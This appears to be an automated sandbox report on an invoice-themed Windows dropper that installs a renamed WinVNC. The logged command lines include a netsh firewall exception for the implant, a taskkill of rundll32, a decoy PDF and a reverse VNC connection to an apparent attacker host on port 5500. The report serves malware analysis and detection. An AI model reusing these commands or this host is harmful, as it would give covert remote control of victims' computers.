Code function: 41_2_000CB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces

41_2_000CB8D0

Source: C:\Games\taskhost.exe

Code function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces

41_2_000CB8D0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009A4836	0_3_009A4836
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009A4942	0_3_009A4942
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009700AC	0_3_009700AC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_00970251	0_3_00970251
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01002440	0_2_01002440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE9080	0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E81490	0_2_00E81490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAF6F0	0_2_00EAF6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FC5910	0_2_00FC5910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FD7CE0	0_2_00FD7CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FD3C50	0_2_00FD3C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0101C3F0	0_2_0101C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01020210	0_2_01020210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EBE4E0	0_2_00EBE4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_010AC5E2	0_2_010AC5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0109A7D0	0_2_0109A7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EB6600	0_2_00EB6600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EB2743	0_2_00EB2743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_010A29F3	0_2_010A29F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01018800	0_2_01018800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0106CA10	0_2_0106CA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EC2BA0	0_2_00EC2BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0102CA50	0_2_0102CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01092DEE	0_2_01092DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EB4E40	0_2_00EB4E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01020FB0	0_2_01020FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0100CED0	0_2_0100CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0109317C	0_2_0109317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAB090	0_2_00EAB090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAF180	0_2_00EAF180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA3390	0_2_00EA3390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E83480	0_2_00E83480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01029470	0_2_01029470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01073650	0_2_01073650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EBF740	0_2_00EBF740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FC3750	0_2_00FC3750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0101DA00	0_2_0101DA00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F99B50	0_2_00F99B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F03B10	0_2_00F03B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E87AA0	0_2_00E87AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0101FFD0	0_2_0101FFD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAFF50	0_2_00EAFF50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0101DEF0	0_2_0101DEF0
Source: C:\Games\viewer.exe	Code function: 6_2_006167A0	6_2_006167A0
Source: C:\Games\viewer.exe	Code function: 6_2_00640040	6_2_00640040
Source: C:\Games\viewer.exe	Code function: 6_2_0063E0E0	6_2_0063E0E0
Source: C:\Games\viewer.exe	Code function: 6_2_00649151	6_2_00649151
Source: C:\Games\viewer.exe	Code function: 6_2_0063B1CB	6_2_0063B1CB
Source: C:\Games\viewer.exe	Code function: 6_2_0061C340	6_2_0061C340
Source: C:\Games\viewer.exe	Code function: 6_2_0063B3FD	6_2_0063B3FD
Source: C:\Games\viewer.exe	Code function: 6_2_006367B0	6_2_006367B0
Source: C:\Games\viewer.exe	Code function: 6_2_00651804	6_2_00651804
Source: C:\Games\viewer.exe	Code function: 6_2_006418B4	6_2_006418B4
Source: C:\Games\viewer.exe	Code function: 6_2_00651924	6_2_00651924
Source: C:\Games\viewer.exe	Code function: 6_2_0061DD00	6_2_0061DD00
Source: C:\Games\viewer.exe	Code function: 6_2_0064FDE4	6_2_0064FDE4
Source: C:\Games\viewer.exe	Code function: 6_2_00654EF0	6_2_00654EF0
Source: C:\Games\viewer.exe	Code function: 6_2_0061FF00	6_2_0061FF00
Source: C:\Games\viewer.exe	Code function: 6_2_00649F09	6_2_00649F09
Source: C:\Games\taskhost.exe	Code function: 41_2_00162820	41_2_00162820
Source: C:\Games\taskhost.exe	Code function: 41_2_0015F0D0	41_2_0015F0D0
Source: C:\Games\taskhost.exe	Code function: 41_2_001DA974	41_2_001DA974
Source: C:\Games\taskhost.exe	Code function: 41_2_000BD9F0	41_2_000BD9F0
Source: C:\Games\taskhost.exe	Code function: 41_2_001E5A2B	41_2_001E5A2B
Source: C:\Games\taskhost.exe	Code function: 41_2_0015FA50	41_2_0015FA50
Source: C:\Games\taskhost.exe	Code function: 41_2_001C4362	41_2_001C4362
Source: C:\Games\taskhost.exe	Code function: 41_2_001E23F9	41_2_001E23F9
Source: C:\Games\taskhost.exe	Code function: 41_2_001CA650	41_2_001CA650
Source: C:\Games\taskhost.exe	Code function: 41_2_000BD700	41_2_000BD700
Source: C:\Games\taskhost.exe	Code function: 41_2_001C3FD4	41_2_001C3FD4

Source: C:\Games\viewer.exe	Code function: String function: 00635126 appears 56 times
Source: C:\Games\viewer.exe	Code function: String function: 00635630 appears 40 times
Source: C:\Games\viewer.exe	Code function: String function: 006350F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00E8A880 appears 58 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00E8AEE0 appears 67 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00E887F0 appears 50 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00E89320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: String function: 00EA5220 appears 35 times
Source: C:\Games\taskhost.exe	Code function: String function: 000BCCB0 appears 34 times

Source: Preventivo24.01.11.exe

Static PE information: invalid certificate

Source: taskhost.exe.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: Preventivo24.01.11.exe, 00000000.00000003.1685751474.0000000007E27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1638029413.000000000120B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685248284.0000000007E1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685666367.0000000007E1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685503614.0000000007E1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B101000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe	Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Section loaded: lpk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior

Source: Preventivo24.01.11.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: shi6E82.tmp.0.dr

Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket

Source: timeout.exe, 00000036.00000002.2263167469.0000000000658000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: .CMD;.VBP~

Source: classification engine

Classification label: mal76.rans.troj.evad.winEXE@110/77@8/5

Source: ~.pdf.0.dr

Initial sample: http://www.pdf-tools.com\

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FC0AF0 FormatMessageW,GetLastError,

0_2_00FC0AF0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF4BE0 GetDiskFreeSpaceExW,

0_2_00FF4BE0

Source: C:\Games\viewer.exe

Code function: 6_2_00613710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

6_2_00613710

Source: C:\Games\viewer.exe

Code function: 6_2_006149C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

6_2_006149C0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00E8A740 LoadResource,LockResource,SizeofResource,

0_2_00E8A740

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Games\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Local\Temp\upd65B7.tmp

Jump to behavior

Source: C:\Games\viewer.exe

Command line argument: Ae

6_2_00654140

Source: Preventivo24.01.11.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Preventivo24.01.11.exe

Virustotal: Detection: 17%

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File read: C:\Users\user\Desktop\Preventivo24.01.11.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
Source: unknown	Process created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
